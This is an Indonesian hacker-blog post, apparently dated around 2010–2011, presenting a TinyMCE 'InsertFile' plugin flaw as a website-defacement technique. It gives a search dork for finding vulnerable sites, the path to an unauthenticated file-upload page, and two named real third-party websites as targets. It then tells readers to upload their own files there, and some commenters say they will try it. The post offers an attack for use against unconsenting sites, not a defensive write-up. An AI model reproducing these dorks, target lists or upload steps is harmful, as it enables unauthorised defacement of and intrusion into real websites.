Home / Vuln / Vuln Plugins TinyMCE Insert File
005-222

Vuln Plugins TinyMCE Insert File

Assalamualaikum πŸ˜€
Apa kabar sahabat Binus ? saya harap Alhamdulillah ya baik hehe.
Okay dengan saya lagi, saya ingin memberi beberapa Exploit yang menarik untuk di jadikan pembelajaran Deface.
Langsung saja kita bahas bersama.

Dork:
– inurl:filemanager/insertFile/
*Use Your Head for many target πŸ˜€

_____________________________________________
/ \
| author: BadBoy |
| E-mail: fikri-badboy@asia-mail.com |
| copyright: 2010-2011 |
| Page:http://www.facebook.com/fikri.badboy |
\_____________________________________________/
| | |
|_ | _|
| | |
|__|__|
/-‘P’-\
(__/ \__)

POC / Exploit :

http://[localhost]/Patch/tiny_mce/plugins/filemanager/InsertFile/insert_file.php

Setelah itu, maka akan tampil gambar berikut.
TinyMCE

Saya memberi beberapa target ny πŸ˜€ hehe
– http://www.verslogalimybes.lt/javascript/libs/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
– http://www.financialmilestones.com.au/wse/tinymce/jscripts/tiny_mce/plugins/filemanager/InsertFile/insert_file.php

Upload file kalian, lalu liat deh hasilnya πŸ˜€
Preview ny bisa dilihat kalo sukses upload ny.

Okay segitu aja dulu ya πŸ˜€
Good Luck ^^

Thanks To: Palembang Hacker Link | Binus Hacker | Tria Wulandari πŸ™ | Shinta Dwi Pratiwi | Maulid Ratu | And My Friends |

Wassalamualaikum.

About BadBoy

Saya baik dengan semua orang, asalkan orang itu baik juga kepada saya :) hehe. Big Fans: Manchester City dan Inter Milan

Check Also

php-s3-appo

PHP S3 Appro [Japanese Sites] Vulnerability

Assalamualaikum sahabat B|H, Baik aja ya semoga, karena hari ini saya mau posting seputar proof …

7 comments

  1. mantap gan,,,,,,,thanks infonya

  2. deface sma dengan phising ga?
    trus web hosting sekarang da banyak pencegahan terhadap yang ginian
    jadi mo di upload kemana ya kira2?

  3. sip min….. maksih infonya

  4. msih blom ngerti nie kk ,,gmana kerjanyah,?
    Cranyah

  5. izin dipraktekkan.. makasi infonya

  6. Thank you ..

    *Deface dn phising berbeda

    _Deface kita hnya membuat halaman HTML / mereplace Homepage dari sebuah situs

    _Phising kita sperti membuat halaman login yg inti nya akan mencari data user & pass dari suatu akun

    πŸ™‚

  7. ada solusi lagi ga selain tinyMCE untuk blogging tools, soalnya web yang lagi gua kembangin pake tinyMCE untuk postingan baru…

    ada alternatif plugin yang safety ga?

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *